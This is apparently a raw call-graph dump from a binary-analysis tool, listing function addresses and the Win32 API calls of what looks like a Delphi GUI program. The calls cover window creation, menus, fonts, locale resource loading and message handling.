46752->46780 46794 4049e4 46754->46794 46757 404d40 46758 404d51 46757->46758 46759 404d77 46758->46759 46760 404d8e 46758->46760 46761 40500c 25 API calls 46759->46761 46762 404a84 25 API calls 46760->46762 46763 404d84 46761->46763 46762->46763 46764 404dbf 46763->46764 46887 404a14 46763->46887 46767 402be0 GetTickCount 46766->46767 46768 402bd5 46766->46768 46767->46747 46768->46747 46771 404a5c 46769->46771 46770 404a80 46773 4049c0 46770->46773 46771->46770 46798 40277c 46771->46798 46774 4049c6 46773->46774 46776 4049e1 46773->46776 46775 40277c 20 API calls 46774->46775 46774->46776 46775->46776 46776->46752 46847 404ab0 46777->46847 46781 404ccb 46780->46781 46782 404c8c 46780->46782 46781->46752 46783 404c96 46782->46783 46789 404a14 46782->46789 46784 404cc0 46783->46784 46785 404ca9 46783->46785 46788 40500c 25 API calls 46784->46788 46881 40500c 46785->46881 46787 404a56 46787->46752 46793 404cae 46788->46793 46790 404a84 25 API calls 46789->46790 46791 404a28 46789->46791 46790->46791 46791->46787 46792 40277c 20 API calls 46791->46792 46792->46787 46793->46752 46796 4049ea 46794->46796 46795 404a10 46795->46757 46796->46795 46797 40277c 20 API calls 46796->46797 46797->46796 46799 402781 46798->46799 46800 402794 46798->46800 46804 401d04 46799->46804 46800->46770 46808 402318 46804->46808 46806 401d25 46806->46800 46807 40286c 11 API calls 46806->46807 46807->46800 46809 402336 46808->46809 46810 402331 46808->46810 46812 402367 RtlEnterCriticalSection 46809->46812 46815 402371 46809->46815 46816 40233a 46809->46816 46822 401a9c RtlInitializeCriticalSection 46810->46822 46812->46815 46813 40237d 46817 4024a9 46813->46817 46818 40249f RtlLeaveCriticalSection 46813->46818 46814 402400 46814->46816 46829 401f30 9 API calls 46814->46829 46815->46813 46815->46814 46820 40242c 46815->46820 46816->46806 46817->46806 46818->46817 46820->46813 46830 401ea8 46820->46830 46823 401ac0 RtlEnterCriticalSection 46822->46823 46824 401aca 46822->46824 46823->46824 46825 401ae8 LocalAlloc 46824->46825 46826 401b02 46825->46826 46827 401b51 46826->46827 46828 401b47 RtlLeaveCriticalSection 46826->46828 46827->46809 46828->46827 46829->46816 46831 401ec6 46830->46831 46832 401efd 46830->46832 46831->46813 46832->46831 46834 401df8 46832->46834 46836 401e0e 46834->46836 46835 401e96 46835->46831 46836->46835 46837 401e39 46836->46837 46838 401e4d 46836->46838 46840 401a10 LocalAlloc VirtualFree VirtualFree 46837->46840 46839 401a10 LocalAlloc VirtualFree VirtualFree 46838->46839 46841 401e4b 46839->46841 46840->46841 46841->46835 46842 401cd4 9 API calls 46841->46842 46843 401e71 46842->46843 46844 401e8b 46843->46844 46845 401d28 9 API calls 46843->46845 46846 401520 LocalAlloc 46844->46846 46845->46844 46846->46835 46852 404a84 46847->46852 46849 404ac0 46850 4049c0 20 API calls 46849->46850 46851 404ad8 46850->46851 46851->46752 46853 404a88 46852->46853 46854 404aac 46852->46854 46857 40275c 46853->46857 46854->46849 46858 402761 46857->46858 46859 402774 46857->46859 46863 402188 46858->46863 46859->46849 46860 402767 46860->46859 46874 40286c 11 API calls 46860->46874 46864 4021a1 46863->46864 46865 40219c 46863->46865 46867 4021ce RtlEnterCriticalSection 46864->46867 46868 4021d8 46864->46868 46871 4021ad 46864->46871 46866 401a9c 4 API calls 46865->46866 46866->46864 46867->46868 46868->46871 46875 402094 46868->46875 46871->46860 46872 402303 46872->46860 46873 4022f9 RtlLeaveCriticalSection 46873->46872 46874->46859 46878 4020a4 46875->46878 46876 4020d0 46877 401ea8 9 API calls 46876->46877 46880 4020f4 46876->46880 46877->46880 46878->46876 46879 402008 12 API calls 46878->46879 46878->46880 46879->46878 46880->46872 46880->46873 46882 405019 46881->46882 46886 405049 46881->46886 46884 404a84 25 API calls 46882->46884 46885 405025 46882->46885 46883 4049c0 20 API calls 46883->46885 46884->46886 46885->46793 46886->46883 46888 404a18 46887->46888 46889 404a28 46887->46889 46888->46889 46891 404a84 25 API calls 46888->46891 46890 404a56 46889->46890 46892 40277c 20 API calls 46889->46892 46890->46764 46891->46889 46892->46890 46894 43c212 46893->46894 46895 43c2ce 46894->46895 46896 43c258 46894->46896 46898 43c2e9 46894->46898 46899 43c2c3 46894->46899 46911 45b21c 118 API calls 46895->46911 46896->46898 46905 45601c 46896->46905 46898->46567 46899->46896 46900 43c32a GetKeyboardState 46899->46900 46901 43c346 46900->46901 46901->46898 46903->46567 46904->46561 46906 45602b 46905->46906 46912 454a44 46906->46912 46909 45604b 46909->46898 46911->46896 46913 454ad8 46912->46913 46915 454a68 46912->46915 46916 454ae9 46913->46916 46948 44e3bc 72 API calls 46913->46948 46915->46913 46920 458260 56 API calls 46915->46920 46941 406a70 46915->46941 46947 40d180 56 API calls 46915->46947 46917 454b29 46916->46917 46918 454bc1 46916->46918 46922 454b9c 46917->46922 46931 454b44 46917->46931 46919 454bdb 46918->46919 46923 454bd5 SetMenu 46918->46923 46921 454bed 46919->46921 46939 454b9a 46919->46939 46920->46915 46951 45497c 62 API calls 46921->46951 46922->46919 46929 454bb0 46922->46929 46923->46919 46927 454bf4 46928 4049c0 20 API calls 46927->46928 46932 454c09 46928->46932 46933 454bb9 SetMenu 46929->46933 46931->46919 46934 454b67 GetMenu 46931->46934 46932->46909 46940 455f20 10 API calls 46932->46940 46933->46919 46935 454b71 46934->46935 46936 454b8a 46934->46936 46938 454b84 SetMenu 46935->46938 46949 44e3bc 72 API calls 46936->46949 46938->46936 46939->46919 46950 455b08 64 API calls 46939->46950 46940->46909 46942 406a80 46941->46942 46943 406ab1 46941->46943 46942->46943 46952 405fdc 46942->46952 46943->46915 46945 406aa0 LoadStringA 46946 404ab0 25 API calls 46945->46946 46946->46943 46947->46915 46948->46916 46949->46939 46950->46921 46951->46927 46953 406003 46952->46953 46954 405fe6 46952->46954 46953->46945 46954->46953 46957 405f94 46954->46957 46958 405fa4 GetModuleFileNameA 46957->46958 46959 405fc0 46957->46959 46961 4061d0 GetModuleFileNameA RegOpenKeyExA 46958->46961 46959->46945 46962 406253 46961->46962 46963 406213 RegOpenKeyExA 46961->46963 46979 406018 12 API calls 46962->46979 46963->46962 46964 406231 RegOpenKeyExA 46963->46964 46964->46962 46966 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 46964->46966 46970 406313 46966->46970 46971 4063f6 46966->46971 46967 406278 RegQueryValueExA 46968 406298 RegQueryValueExA 46967->46968 46969 4062b6 RegCloseKey 46967->46969 46968->46969 46969->46959 46970->46971 46973 406323 lstrlen 46970->46973 46971->46959 46974 40633b 46973->46974 46974->46971 46975 406360 lstrcpyn LoadLibraryExA 46974->46975 46976 406388 46974->46976 46975->46976 46976->46971 46977 406392 lstrcpyn LoadLibraryExA 46976->46977 46977->46971 46978 4063c4 lstrcpyn LoadLibraryExA 46977->46978 46978->46971 46979->46967 46980->46572 46981->46574 46983 4597fb 46982->46983 46984 459825 46983->46984 46985 459815 46983->46985 46986 459806 SetThreadLocale 46983->46986 46984->46580 46985->46984 47027 4587a4 46985->47027 47026 40e2e8 74 API calls 46986->47026 46989->46605 46990->46581 46991->46605 46992->46605 46993->46605 47053 42b534 46994->47053 46997 45a047 LoadIconA 46998 45a053 46997->46998 46998->46605 46999->46635 47000->46650 47001->46651 47002->46649 47003->46605 47005 43c14c SetFocus 47004->47005 47005->46605 47006->46634 47007->46594 47008->46594 47009->46594 47011 445edf 47010->47011 47012 445ed8 47010->47012 47072 445e34 47011->47072 47015 445f0a SystemParametersInfoA 47012->47015 47016 445f1b SendMessageA 47012->47016 47021 445edd 47012->47021 47015->47021 47016->47021 47017 445ef5 47076 445e50 SystemParametersInfoA 47017->47076 47018 445eec 47075 445e80 6 API calls 47018->47075 47021->46628 47022 445efc 47022->46628 47023->46644 47024->46605 47025->46605 47026->46985 47029 4587bd 47027->47029 47028 4587ee SystemParametersInfoA 47030 458801 CreateFontIndirectA 47028->47030 47031 458819 GetStockObject 47028->47031 47029->47028 47045 424fcc 47030->47045 47033 424fcc 30 API calls 47031->47033 47035 45882d SystemParametersInfoA 47033->47035 47036 458881 47035->47036 47037 45884d CreateFontIndirectA 47035->47037 47050 4250b0 30 API calls 47036->47050 47038 424fcc 30 API calls 47037->47038 47040 458866 CreateFontIndirectA 47038->47040 47042 424fcc 30 API calls 47040->47042 47041 458891 GetStockObject 47043 424fcc 30 API calls 47041->47043 47044 45887f 47042->47044 47043->47044 47044->46984 47051 424b88 GetObjectA 47045->47051 47047 424fde 47052 424dc0 29 API calls 47047->47052 47049 424fe7 47049->47035 47050->47041 47051->47047 47052->47049 47056 42b570 47053->47056 47057 42b53e 47056->47057 47058 42b580 47056->47058 47057->46997 47057->46998 47058->47057 47065 41d8cc 47058->47065 47060 42b59f 47060->47057 47061 42b5b9 47060->47061 47062 42b5ac 47060->47062 47069 426aa0 62 API calls 47061->47069 47070 425f4c 56 API calls 47062->47070 47066 41d8d9 47065->47066 47067 41d8fa 47065->47067 47066->47067 47071 40d200 56 API calls 47066->47071 47067->47060 47069->47057 47070->47057 47071->47067 47077 42c5e4 47072->47077 47075->47021 47076->47022 47078 42c5f4 47077->47078 47081 42c614 47077->47081 47084 42c4fc 47078->47084 47082 42c645 GetSystemMetrics 47081->47082 47083 42c64b 47081->47083 47082->47083 47083->47017 47083->47018 47085 42c512 47084->47085 47087 42c585 47085->47087 47088 42c56d 47085->47088 47091 42c4fc 20 API calls 47085->47091 47086 4049c0 20 API calls 47089 42c5ba KiUserCallbackDispatcher 47086->47089 47087->47086 47090 42c575 GetProcAddress 47088->47090 47089->47083 47090->47087 47092 42c557 47091->47092 47092->47088 47093 42c565 47092->47093 47094 4049c0 20 API calls 47093->47094 47094->47088 47095 409974 WriteFile 47096 409991 47095->47096 47097 45e750 47098 45e9bb 47097->47098 47099 45e769 47097->47099 47099->47098 47100 40275c 25 API calls 47099->47100 47104 45e8f3 47100->47104 47101 45e958 SHChangeNotifyRegister 47102 40277c 20 API calls 47101->47102 47103 45e9b3 47102->47103 47104->47101 47105 41ac6c 56 API calls 47104->47105 47105->47104 47106 45f1c0 47118 417608 47106->47118 47108 45f1f2 47109 45f1f6 47108->47109 47110 45f1ff 47108->47110 47125 45d2f8 SHGetSpecialFolderLocation 47109->47125 47126 45d3f8 47110->47126 47115 45f1fb 47116 4049c0 20 API calls 47115->47116 47117 45f23e 47116->47117 47119 417613 47118->47119 47120 41761d 47118->47120 47134 409628 47119->47134 47123 41763b 47120->47123 47124 409628 56 API calls 47120->47124 47123->47108 47124->47123 47125->47115 47139 40de68 47126->47139 47129 45d324 47147 4051ec 47129->47147 47131 45d35b 47163 4050a0 47131->47163 47135 409638 47134->47135 47136 409659 47135->47136 47138 408c7c 56 API calls 47135->47138 47136->47108 47138->47136 47142 40de7c 47139->47142 47143 404a14 25 API calls 47142->47143 47145 40de8b 47143->47145 47144 40de77 47144->47129 47145->47144 47146 404c88 25 API calls 47145->47146 47146->47144 47148 405100 47147->47148 47149 405119 47148->47149 47152 405122 47148->47152 47150 4050a0 SysFreeString 47149->47150 47154 405120 47150->47154 47151 405155 47168 405348 SysAllocStringLen SysFreeString 47151->47168 47152->47151 47166 404b00 MultiByteToWideChar 47152->47166 47154->47131 47156 405160 47169 404b00 MultiByteToWideChar 47156->47169 47157 405140 47157->47151 47159 405146 47157->47159 47167 405070 SysAllocStringLen SysFreeString SysAllocStringLen SysFreeString 47159->47167 47160 40516e 47170 405348 SysAllocStringLen SysFreeString 47160->47170 47164 4050b4 47163->47164 47165 4050a6 SysFreeString 47163->47165 47164->47115 47165->47164 47166->47157 47167->47154 47168->47156 47169->47160 47170->47154 47171 434434 47174 43e6bc 47171->47174 47182 43e6ef 47174->47182 47175 43e768 GetClassInfoA 47176 43e78f 47175->47176 47177 43e7cd 47176->47177 47178 43e7a0 UnregisterClassA 47176->47178 47179 43e7ad RegisterClassA 47176->47179 47202 43e88c 47177->47202 47178->47179 47179->47177 47180 43e7c8 47179->47180 47230 40e79c 58 API calls 47180->47230 47181 406a70 56 API calls 47185 43e751 47181->47185 47182->47175 47182->47181 47188 43e71c 47182->47188 47229 40d180 56 API calls 47185->47229 47186 43e7f1 GetWindowLongA 47190 43e827 47186->47190 47191 43e806 GetWindowLongA 47186->47191 47188->47175 47205 40a1d4 47190->47205 47191->47190 47193 43e818 SetWindowLongA 47191->47193 47193->47190 47196 43e83b 47216 424e24 47196->47216 47198 43e845 47199 4049c0 20 API calls 47198->47199 47200 43445b 47199->47200 47232 407a8c 47202->47232 47204 43e7e3 47204->47186 47231 40e79c 58 API calls 47204->47231 47206 40a1e2 47205->47206 47207 40a1d8 47205->47207 47209 441a14 IsIconic 47206->47209 47208 40277c 20 API calls 47207->47208 47208->47206 47210 441a51 GetWindowRect 47209->47210 47211 441a2c GetWindowPlacement 47209->47211 47212 441a5e GetWindowLongA 47210->47212 47211->47212 47213 441a73 GetWindowLongA 47212->47213 47214 441a99 47212->47214 47213->47214 47215 441a87 ScreenToClient ScreenToClient 47213->47215 47214->47196 47215->47214 47217 424e59 47216->47217 47218 424f8c 47216->47218 47237 424168 RtlEnterCriticalSection 47217->47237 47220 4049e4 20 API calls 47218->47220 47221 424fac 47220->47221 47221->47198 47222 424f6d 47239 424174 RtlLeaveCriticalSection 47222->47239 47224 424f84 47224->47198 47225 424e63 47225->47222 47238 408f88 CompareStringA 47225->47238 47227 424f5e CreateFontIndirectA 47227->47222 47228 424efa 47228->47227 47229->47188 47230->47177 47231->47186 47236 402c0c 47232->47236 47234 407a9f CreateWindowExA 47235 407ad9 47234->47235 47235->47204 47236->47234 47237->47225 47238->47228 47239->47224 47240 45288c 47241 4528a8 47240->47241 47242 452897 47240->47242 47243 4528a1 47242->47243 47244 4528aa 47242->47244 47249 452868 47243->47249 47255 4523c0 62 API calls 47244->47255 47247 4528b7 47256 4523c0 62 API calls 47247->47256 47250 452874 47249->47250 47251 45288a 47249->47251 47257 451c74 47250->47257 47251->47241 47254 451c74 62 API calls 47254->47251 47255->47247 47256->47241 47258 451c92 47257->47258 47259 451d0d 47257->47259 47260 451d0f 47258->47260 47265 451ca0 47258->47265 47259->47254 47261 4523a8 62 API calls 47260->47261 47261->47259 47262 451cf6 47266 4523a8 47262->47266 47264 43e3f8 56 API calls 47264->47265 47265->47262 47265->47264 47267 4523b1 47266->47267 47270 4528e8 47267->47270 47269 4523be 47269->47259 47271 4529da 47270->47271 47272 4528ff 47270->47272 47271->47269 47272->47271 47291 451e88 47272->47291 47275 45295f 47278 451e88 2 API calls 47275->47278 47276 452939 47277 4524f4 62 API calls 47276->47277 47280 45294b 47277->47280 47279 45296d 47278->47279 47281 452997 47279->47281 47282 452971 47279->47282 47283 4524f4 62 API calls 47280->47283 47294 4524f4 47281->47294 47284 4524f4 62 API calls 47282->47284 47286 45295d 47283->47286 47287 452983 47284->47287 47286->47269 47289 4524f4 62 API calls 47287->47289 47289->47286 47290 4524f4 62 API calls 47290->47286 47306 451e08 47291->47306 47293 451e96 47293->47275 47293->47276 47295 45251a 47294->47295 47296 452533 47295->47296 47297 451e08 2 API calls 47295->47297 47298 451e08 2 API calls 47296->47298 47297->47296 47299 452581 47298->47299 47316 4523ec 47299->47316 47301 45259b 47320 452270 59 API calls 47301->47320 47303 4525cc 47304 451e08 2 API calls 47303->47304 47305 4525d7 47304->47305 47305->47290 47307 441704 47306->47307 47308 451e25 GetWindowLongA 47307->47308 47309 451e62 47308->47309 47310 451e42 47308->47310 47315 451d8c GetWindowLongA 47309->47315 47314 451d8c GetWindowLongA 47310->47314 47313 451e4e 47313->47293 47314->47313 47315->47313 47317 452429 47316->47317 47321 424950 47317->47321 47319 4524ce 47319->47301 47320->47303 47322 424954 GetSysColor 47321->47322 47323 42495f 47321->47323 47322->47323 47323->47319 47324 49ab80 47335 406d28 GetModuleHandleA 47324->47335 47326 49ab90 47339 45a28c 47326->47339 47330 49abc5 47354 45a714 47330->47354 47336 406d5b 47335->47336 47368 404684 47336->47368 47340 45a2ae 47339->47340 47341 45a2eb 47339->47341 47562 45a240 26 API calls 47340->47562 47342 404a14 25 API calls 47341->47342 47344 45a2e9 47342->47344 47345 4049c0 20 API calls 47344->47345 47346 45a30d 47345->47346 47350 45a694 47346->47350 47347 45a2b8 47347->47344 47348 45a2d4 SetWindowTextA 47347->47348 47349 4049c0 20 API calls 47348->47349 47349->47344 47351 45a6a7 47350->47351 47563 452e3c 47351->47563 47352 45a6c8 47352->47330 47775 408d70 25 API calls 47354->47775 47356 45a740 47357 45a7da 47356->47357 47358 45a769 47356->47358 47359 45a75b 47356->47359 47367 40484c 7 API calls 47357->47367 47781 454d78 ShowWindow 47358->47781 47361 45a790 47359->47361 47362 45a792 47359->47362 47363 45a788 47359->47363 47361->47357 47776 45a580 47361->47776 47783 453c80 56 API calls 47362->47783 47782 45a054 70 API calls 47363->47782 47369 4046b7 47368->47369 47372 404624 47369->47372 47373 404660 47372->47373 47374 404633 47372->47374 47373->47326 47374->47373 47376 405f94 30 API calls 47374->47376 47377 40275c 25 API calls 47374->47377 47378 446564 47374->47378 47376->47374 47377->47374 47379 4465dc 47378->47379 47380 44657e GetVersion 47378->47380 47379->47374 47392 446330 GetCurrentProcessId 47380->47392 47384 4465a2 47424 41a548 58 API calls 47384->47424 47386 4465ac 47425 41a4f4 58 API calls 47386->47425 47388 4465bc 47426 41a4f4 58 API calls 47388->47426 47390 4465cc 47427 41a4f4 58 API calls 47390->47427 47428 40a664 47392->47428 47395 404a14 25 API calls 47396 446379 47395->47396 47397 446383 GlobalAddAtomA GetCurrentThreadId 47396->47397 47398 40a664 56 API calls 47397->47398 47399 4463bd 47398->47399 47400 404a14 25 API calls 47399->47400 47401 4463ca 47400->47401 47402 4463d4 GlobalAddAtomA 47401->47402 47431 404e80 47402->47431 47406 446401 47437 445f34 47406->47437 47408 44640b 47445 445d5c 47408->47445 47410 446417 47449 457fc8 47410->47449 47412 44642a 47466 4590ac 47412->47466 47414 446440 47480 41a634 58 API calls 47414->47480 47416 44646a GetModuleHandleA 47417 44648a 47416->47417 47418 44647a GetProcAddress 47416->47418 47419 4049c0 20 API calls 47417->47419 47418->47417 47420 44649f 47419->47420 47421 4049c0 20 API calls 47420->47421 47422 4464a7 47421->47422 47423 41a4a8 58 API calls 47422->47423 47423->47384 47424->47386 47425->47388 47426->47390 47427->47379 47481 40a678 47428->47481 47432 404e84 RegisterClipboardFormatA 47431->47432 47433 41af14 47432->47433 47434 41af1a 47433->47434 47435 41af2f RtlInitializeCriticalSection 47434->47435 47436 41af44 47435->47436 47436->47406 47438 4460a1 47437->47438 47439 445f48 SetErrorMode 47437->47439 47438->47408 47440 445f6c GetModuleHandleA GetProcAddress 47439->47440 47441 445f88 47439->47441 47440->47441 47442 445f95 LoadLibraryA 47441->47442 47443 446083 SetErrorMode 47441->47443 47442->47443 47444 445fb1 10 API calls 47442->47444 47443->47408 47444->47443 47446 445d62 47445->47446 47447 445ed0 32 API calls 47446->47447 47448 445dd0 47447->47448 47448->47410 47450 457fd2 47449->47450 47496 421b3c 47450->47496 47452 457fe8 47500 458384 LoadCursorA 47452->47500 47455 458021 47456 45805d 73CCAC50 73CCAD70 73CCB380 47455->47456 47457 458093 47456->47457 47505 424c3c 47457->47505 47459 45809f 47460 424c3c 27 API calls 47459->47460 47461 4580b1 47460->47461 47462 424c3c 27 API calls 47461->47462 47463 4580c3 47462->47463 47464 4587a4 38 API calls 47463->47464 47465 4580d0 47464->47465 47465->47412 47467 4590bb 47466->47467 47468 421b3c 56 API calls 47467->47468 47469 4590d1 47468->47469 47470 45917c LoadIconA 47469->47470 47523 42b7c8 47470->47523 47472 45919f GetModuleFileNameA OemToCharA 47473 4591e8 47472->47473 47474 45920e CharLowerA 47473->47474 47475 459231 47474->47475 47476 459242 47475->47476 47525 4593b4 47475->47525 47549 45b188 20 API calls 47476->47549 47479 459264 47479->47414 47480->47416 47483 40a69c 47481->47483 47482 40a6c7 47485 40a71f 47482->47485 47492 40a6dc 47482->47492 47483->47482 47494 40a26c 56 API calls 47483->47494 47486 404ab0 25 API calls 47485->47486 47487 40a673 47486->47487 47487->47395 47488 40a715 47489 40500c 25 API calls 47488->47489 47489->47487 47490 4049c0 20 API calls 47490->47492 47491 40500c 25 API calls 47491->47492 47492->47488 47492->47490 47492->47491 47495 40a26c 56 API calls 47492->47495 47494->47482 47495->47492 47497 421b43 47496->47497 47499 421b66 47497->47499 47509 421cf4 56 API calls 47497->47509 47499->47452 47501 4583a3 47500->47501 47502 4583bc LoadCursorA 47501->47502 47504 45800b GetKeyboardLayout 47501->47504 47510 45843c 47502->47510 47504->47455 47506 424c42 47505->47506 47513 424180 47506->47513 47508 424c64 47508->47459 47509->47499 47511 40275c 25 API calls 47510->47511 47512 45844f 47511->47512 47512->47501 47514 42419b 47513->47514 47521 424168 RtlEnterCriticalSection 47514->47521 47516 4241a5 47518 40275c 25 API calls 47516->47518 47520 424202 47516->47520 47518->47520 47519 424253 47519->47508 47522 424174 RtlLeaveCriticalSection 47520->47522 47521->47516 47522->47519 47524 42b7d4 47523->47524 47524->47472 47526 4593dd 47525->47526 47527 45953f 47525->47527 47526->47527 47550 422bcc 47526->47550 47528 4049c0 20 API calls 47527->47528 47530 459554 47528->47530 47530->47476 47531 4593f6 GetClassInfoA 47532 45941c RegisterClassA 47531->47532 47537 459451 47531->47537 47533 459435 47532->47533 47532->47537 47534 406a70 56 API calls 47533->47534 47535 459442 47534->47535 47557 40d144 47535->47557 47553 407ae4 47537->47553 47539 4594a8 47540 4049c0 20 API calls 47539->47540 47541 4594b6 SetWindowLongA 47540->47541 47542 4594d6 47541->47542 47543 459501 GetSystemMenu DeleteMenu DeleteMenu 47541->47543 47545 45a038 63 API calls 47542->47545 47543->47527 47544 459532 DeleteMenu 47543->47544 47544->47527 47546 4594dd SendMessageA 47545->47546 47547 45a038 63 API calls 47546->47547 47548 4594f5 SetClassLongA 47547->47548 47548->47543 47549->47479 47551 422bdc VirtualAlloc 47550->47551 47552 422c0a 47550->47552 47551->47552 47552->47531 47561 402c0c 47553->47561 47555 407af7 CreateWindowExA 47556 407b2f 47555->47556 47556->47539 47558 40d14b 47557->47558 47559 404a14 25 API calls 47558->47559 47560 40d163 47559->47560 47560->47537 47561->47555 47562->47347 47564 452e52 47563->47564 47565 452f66 47564->47565 47572 41aa2c 47564->47572 47565->47352 47567 452f2b 47567->47352 47568 452ee2 47568->47567 47569 406a70 56 API calls 47568->47569 47570 452f19 47569->47570 47582 40d180 56 API calls 47570->47582 47573 41aa42 47572->47573 47574 41aa77 47573->47574 47595 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 47573->47595 47583 41a984 47574->47583 47578 41aaa2 47580 41aaba 47578->47580 47597 41a928 56 API calls 47578->47597 47580->47568 47582->47567 47586 41a9ae 47583->47586 47594 41aa02 47583->47594 47584 4049c0 20 API calls 47585 41aa19 47584->47585 47585->47578 47596 41a8f8 56 API calls 47585->47596 47587 41a984 137 API calls 47586->47587 47586->47594 47588 41a9c6 47587->47588 47598 405f8c 47588->47598 47591 405fdc 30 API calls 47592 41a9f4 47591->47592 47601 41a81c 47592->47601 47594->47584 47595->47574 47596->47578 47597->47580 47610 405f64 VirtualQuery 47598->47610 47602 41a82d 47601->47602 47603 41a83c FindResourceA 47602->47603 47604 41a899 47603->47604 47605 41a84c 47603->47605 47604->47594 47612 41e0d0 47605->47612 47607 41a85d 47616 41da30 47607->47616 47609 41a878 47609->47594 47611 405f7e 47610->47611 47611->47591 47613 41e0da 47612->47613 47621 41e198 FindResourceA 47613->47621 47615 41e108 47615->47607 47633 41e254 47616->47633 47618 41da4c 47637 420288 47618->47637 47620 41da67 47620->47609 47622 41e1c4 LoadResource 47621->47622 47623 41e1bd 47621->47623 47625 41e1d7 47622->47625 47626 41e1de SizeofResource LockResource 47622->47626 47631 41e128 56 API calls 47623->47631 47632 41e128 56 API calls 47625->47632 47629 41e1fc 47626->47629 47627 41e1c3 47627->47622 47629->47615 47630 41e1dd 47630->47626 47631->47627 47632->47630 47634 41e25e 47633->47634 47635 40275c 25 API calls 47634->47635 47636 41e277 47635->47636 47636->47618 47666 420670 47637->47666 47640 420300 47727 420694 47640->47727 47641 420335 47642 420694 56 API calls 47641->47642 47644 420346 47642->47644 47646 42034f 47644->47646 47647 42035c 47644->47647 47649 420694 56 API calls 47646->47649 47650 420694 56 API calls 47647->47650 47655 420328 47649->47655 47652 420377 47650->47652 47651 420313 47654 420694 56 API calls 47651->47654 47737 420228 56 API calls 47652->47737 47654->47655 47671 41a0e8 47655->47671 47659 4203d0 47662 420460 47659->47662 47690 425a84 47659->47690 47694 4534ec 47659->47694 47717 425d3c 47659->47717 47660 4204a0 47660->47620 47662->47660 47738 41ac6c 56 API calls 47662->47738 47739 41ee34 47666->47739 47669 4202c1 47669->47640 47669->47641 47672 41a0f5 47671->47672 47745 419fd4 RtlEnterCriticalSection 47672->47745 47674 41a1cf 47746 41a08c RtlLeaveCriticalSection 47674->47746 47677 41a1e6 47682 406cdc 47677->47682 47680 41a12c 47681 41a18e 47680->47681 47747 41ac6c 56 API calls 47680->47747 47748 419b10 56 API calls 47680->47748 47681->47674 47749 41ac6c 56 API calls 47681->47749 47683 406d11 TlsGetValue 47682->47683 47684 406ceb 47682->47684 47685 406cf6 47683->47685 47686 406d1b 47683->47686 47684->47659 47750 406c98 LocalAlloc TlsSetValue 47685->47750 47686->47659 47688 406cfb TlsGetValue 47689 406d0a 47688->47689 47689->47659 47691 425d3c 73 API calls 47690->47691 47692 425a9a 47691->47692 47693 425ab3 GetTextExtentPoint32A 47692->47693 47693->47662 47695 4534ff 47694->47695 47751 43d6f8 47695->47751 47697 45354a 47698 4535b9 47697->47698 47700 4536b6 47697->47700 47703 4535aa MulDiv 47697->47703 47756 453874 74 API calls 47698->47756 47705 45371b 47700->47705 47759 452b4c 64 API calls 47700->47759 47701 4535d2 47701->47700 47757 452b4c 64 API calls 47701->47757 47755 424ff8 29 API calls 47703->47755 47704 453709 47760 4411c8 56 API calls 47704->47760 47705->47662 47709 4535f3 47758 4411c8 56 API calls 47709->47758 47711 453606 47712 453635 47711->47712 47713 453612 MulDiv 47711->47713 47714 453664 47712->47714 47715 453641 MulDiv 47712->47715 47713->47712 47714->47700 47716 453670 MulDiv MulDiv 47714->47716 47715->47714 47716->47700 47718 425da2 47717->47718 47724 425d55 47717->47724 47718->47662 47719 425d79 47720 425d8a 47719->47720 47766 425dd8 27 API calls 47719->47766 47722 425d96 47720->47722 47767 425e04 6 API calls 47720->47767 47722->47718 47768 425e34 10 API calls 47722->47768 47724->47719 47765 40d200 56 API calls 47724->47765 47728 41ee34 56 API calls 47727->47728 47729 4206a9 47728->47729 47730 404ab0 25 API calls 47729->47730 47731 4206b7 47730->47731 47769 404ed8 47731->47769 47734 41ee34 56 API calls 47735 42030b 47734->47735 47736 41a398 58 API calls 47735->47736 47736->47651 47737->47655 47738->47662 47742 41ee3f 47739->47742 47740 41ee79 47740->47669 47743 41e8f4 56 API calls 47740->47743 47742->47740 47744 41ee80 56 API calls 47742->47744 47743->47669 47744->47742 47745->47680 47746->47677 47747->47680 47748->47680 47749->47681 47750->47688 47752 43d70a 47751->47752 47761 43a3b8 47752->47761 47754 43d722 47754->47697 47755->47698 47756->47701 47757->47709 47758->47711 47759->47704 47760->47705 47762 43a3d4 47761->47762 47763 421f9c 103 API calls 47762->47763 47764 43a3ea 47763->47764 47764->47754 47765->47719 47766->47720 47767->47722 47768->47718 47770 404e8c 47769->47770 47771 404ec7 47770->47771 47772 404a84 25 API calls 47770->47772 47771->47734 47773 404ea3 47772->47773 47773->47771 47774 40277c 20 API calls 47773->47774 47774->47771 47775->47356 47784 45a4e8 PeekMessageA 47776->47784 47779 45a59c 47779->47361 47781->47359 47782->47361 47783->47361 47785 45a504 47784->47785 47786 45a572 47784->47786 47785->47786 47797 45a448 47785->47797 47786->47779 47796 45ae50 89 API calls 47786->47796 47795 45a564 TranslateMessage DispatchMessageA 47795->47786 47796->47779 47798 45a473 47797->47798 47799 45a45c 47797->47799 47798->47786 47801 45a340 47798->47801 47799->47798 47821 45b3a8 8 API calls 47799->47821 47802 45a350 47801->47802 47803 45a38a 47801->47803 47802->47803 47804 45a377 TranslateMDISysAccel 47802->47804 47803->47786 47805 45a390 47803->47805 47804->47803 47806 45a441 47805->47806 47807 45a3a8 47805->47807 47806->47786 47818 45a31c 47806->47818 47807->47806 47808 45a3b3 GetCapture 47807->47808 47809 45a414 GetWindowLongA 47808->47809 47813 45a3be 47808->47813 47809->47806 47810 45a424 SendMessageA 47809->47810 47810->47806 47812 45a410 47810->47812 47812->47806 47814 45a3ef 47813->47814 47815 45a3d8 GetParent 47813->47815 47817 45a3cf 47813->47817 47822 437e5c 7 API calls 47813->47822 47816 45a3f5 SendMessageA 47814->47816 47814->47817 47815->47813 47816->47806 47816->47812 47817->47816 47819 45a33c 47818->47819 47820 45a32f IsDialogMessage 47818->47820 47819->47786 47819->47795 47820->47819 47821->47798 47822->47813 47823 40408a 47828 40416d 47823->47828 47829 40409d 47823->47829 47824 404110 47825 404140 RtlUnwind 47824->47825 47826 40412b UnhandledExceptionFilter 47824->47826 47827 406cdc 4 API calls 47825->47827 47826->47825 47826->47828 47827->47828 47829->47824 47829->47828 47830 4040f0 UnhandledExceptionFilter 47829->47830 47830->47828 47831 404105 47830->47831 47831->47825 47832 4348a8 47833 4348d3 47832->47833 47834 43497d 47832->47834 47836 4348e3 SendMessageA 47833->47836 47835 4049c0 20 API calls 47834->47835 47837 434992 47835->47837 47838 434901 47836->47838 47839 4348ef 47836->47839 47842 434912 SendMessageA 47838->47842 47850 404ccc 47839->47850 47841 4348ff 47844 434959 SendMessageA 47841->47844 47842->47834 47843 43491e 47842->47843 